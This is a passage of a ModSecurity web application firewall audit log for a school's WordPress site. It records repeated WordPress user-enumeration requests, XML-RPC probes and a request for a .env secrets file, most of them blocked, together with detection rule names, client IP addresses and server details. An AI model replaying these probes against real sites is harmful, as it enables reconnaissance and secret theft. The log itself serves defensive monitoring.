[rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746351504783803 831 (- - -) Stopwatch2: 1746351504783803 831; combined=346, p1=307, p2=0, p3=0, p4=0, p5=39, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acbd083e-Z-- --82615417-A-- [04/May/2025:16:45:07 +0700] aBc3I-chPF6irSergtsBlwAAAMo 103.236.140.4 59232 103.236.140.4 8181 --82615417-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --82615417-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82615417-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746351907762301 3220 (- - -) Stopwatch2: 1746351907762301 3220; combined=1326, p1=445, p2=841, p3=0, p4=0, p5=40, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82615417-Z-- --1629e846-A-- [04/May/2025:16:45:16 +0700] aBc3LOchPF6irSergtsBmgAAAMk 103.236.140.4 59244 103.236.140.4 8181 --1629e846-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.87 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1629e846-C-- demo.sayHello --1629e846-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1629e846-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746351916562878 6503 (- - -) Stopwatch2: 1746351916562878 6503; combined=4717, p1=630, p2=3845, p3=41, p4=43, p5=95, sr=104, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1629e846-Z-- --8ee9160b-A-- [04/May/2025:16:45:20 +0700] aBc3MPnZiHJYHUAF8QfkEwAAABc 103.236.140.4 59246 103.236.140.4 8181 --8ee9160b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8ee9160b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ee9160b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746351920375052 2661 (- - -) Stopwatch2: 1746351920375052 2661; combined=1191, p1=437, p2=724, p3=0, p4=0, p5=30, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ee9160b-Z-- --680ebb4b-A-- [04/May/2025:16:45:24 +0700] aBc3NOchPF6irSergtsBnQAAANM 103.236.140.4 59252 103.236.140.4 8181 --680ebb4b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.161 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --680ebb4b-C-- demo.sayHello --680ebb4b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --680ebb4b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746351924733624 4691 (- - -) Stopwatch2: 1746351924733624 4691; combined=3612, p1=454, p2=2950, p3=21, p4=23, p5=95, sr=67, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --680ebb4b-Z-- --5f17962e-A-- [04/May/2025:16:45:52 +0700] aBc3UOchPF6irSergtsBngAAAM8 103.236.140.4 59258 103.236.140.4 8181 --5f17962e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5f17962e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f17962e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746351952488872 3148 (- - -) Stopwatch2: 1746351952488872 3148; combined=1373, p1=517, p2=826, p3=0, p4=0, p5=30, sr=142, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f17962e-Z-- --58767b64-A-- [04/May/2025:16:46:01 +0700] aBc3WechPF6irSergtsBnwAAANE 103.236.140.4 59262 103.236.140.4 8181 --58767b64-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --58767b64-C-- demo.sayHello --58767b64-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --58767b64-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746351961885092 6580 (- - -) Stopwatch2: 1746351961885092 6580; combined=4828, p1=626, p2=3959, p3=37, p4=41, p5=99, sr=76, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58767b64-Z-- --1789df6e-A-- [04/May/2025:16:47:14 +0700] aBc3ouchPF6irSergtsBogAAAME 103.236.140.4 59274 103.236.140.4 8181 --1789df6e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1789df6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1789df6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746352034798929 3291 (- - -) Stopwatch2: 1746352034798929 3291; combined=1485, p1=493, p2=960, p3=0, p4=0, p5=32, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1789df6e-Z-- --7c3b8111-A-- [04/May/2025:16:47:19 +0700] aBc3p-chPF6irSergtsBpAAAANA 103.236.140.4 59278 103.236.140.4 8181 --7c3b8111-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.54 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7c3b8111-C-- demo.sayHello --7c3b8111-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c3b8111-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746352039293219 4269 (- - -) Stopwatch2: 1746352039293219 4269; combined=2945, p1=370, p2=2414, p3=22, p4=25, p5=67, sr=53, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c3b8111-Z-- --f5423e77-A-- [04/May/2025:16:52:41 +0700] aBc46echPF6irSergtsBrQAAANM 103.236.140.4 59326 103.236.140.4 8181 --f5423e77-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f5423e77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5423e77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746352361064658 3140 (- - -) Stopwatch2: 1746352361064658 3140; combined=1318, p1=454, p2=829, p3=0, p4=0, p5=35, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5423e77-Z-- --2152815c-A-- [04/May/2025:16:52:48 +0700] aBc48PnZiHJYHUAF8QfkGQAAABg 103.236.140.4 59330 103.236.140.4 8181 --2152815c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.40 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2152815c-C-- demo.sayHello --2152815c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2152815c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746352368321977 4992 (- - -) Stopwatch2: 1746352368321977 4992; combined=3815, p1=431, p2=3164, p3=28, p4=31, p5=93, sr=67, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2152815c-Z-- --3033255f-A-- [04/May/2025:16:54:08 +0700] aBc5QOchPF6irSergtsBrwAAANY 103.236.140.4 59346 103.236.140.4 8181 --3033255f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.190 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3033255f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3033255f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746352448126157 3366 (- - -) Stopwatch2: 1746352448126157 3366; combined=1439, p1=455, p2=939, p3=0, p4=0, p5=45, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3033255f-Z-- --363e1a70-A-- [04/May/2025:16:54:16 +0700] aBc5SOchPF6irSergtsBsAAAANI 103.236.140.4 59350 103.236.140.4 8181 --363e1a70-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.190 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --363e1a70-C-- demo.sayHello --363e1a70-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --363e1a70-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746352456640840 6140 (- - -) Stopwatch2: 1746352456640840 6140; combined=4401, p1=623, p2=3547, p3=32, p4=35, p5=96, sr=124, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --363e1a70-Z-- --6f8a0c0a-A-- [04/May/2025:17:16:00 +0700] aBc-YPnZiHJYHUAF8QfkJQAAABQ 103.236.140.4 59486 103.236.140.4 8181 --6f8a0c0a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 Accept-Charset: utf-8 --6f8a0c0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f8a0c0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746353760685714 892 (- - -) Stopwatch2: 1746353760685714 892; combined=392, p1=292, p2=0, p3=0, p4=0, p5=100, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f8a0c0a-Z-- --3f7c341e-A-- [04/May/2025:17:17:29 +0700] aBc-udsVQyl9V2B8Pt_APQAAAEU 103.236.140.4 59500 103.236.140.4 8181 --3f7c341e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3f7c341e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f7c341e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746353849911918 3170 (- - -) Stopwatch2: 1746353849911918 3170; combined=1439, p1=472, p2=934, p3=0, p4=0, p5=33, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f7c341e-Z-- --a5f0fb38-A-- [04/May/2025:17:17:34 +0700] aBc-vuchPF6irSergtsBvAAAAMU 103.236.140.4 59504 103.236.140.4 8181 --a5f0fb38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.212 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a5f0fb38-C-- demo.sayHello --a5f0fb38-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5f0fb38-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746353854982801 5126 (- - -) Stopwatch2: 1746353854982801 5126; combined=3941, p1=522, p2=3216, p3=22, p4=24, p5=91, sr=113, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5f0fb38-Z-- --6f8a0c0a-A-- [04/May/2025:17:40:17 +0700] aBdEEWJEE9ao5dcyYWn3cgAAAJU 103.236.140.4 59640 103.236.140.4 8181 --6f8a0c0a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6f8a0c0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f8a0c0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746355217210691 2375 (- - -) Stopwatch2: 1746355217210691 2375; combined=1280, p1=404, p2=845, p3=0, p4=0, p5=30, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f8a0c0a-Z-- --c8e61818-A-- [04/May/2025:17:40:22 +0700] aBdEFmJEE9ao5dcyYWn3cwAAAIo 103.236.140.4 59644 103.236.140.4 8181 --c8e61818-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.96 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c8e61818-C-- demo.sayHello --c8e61818-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8e61818-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s 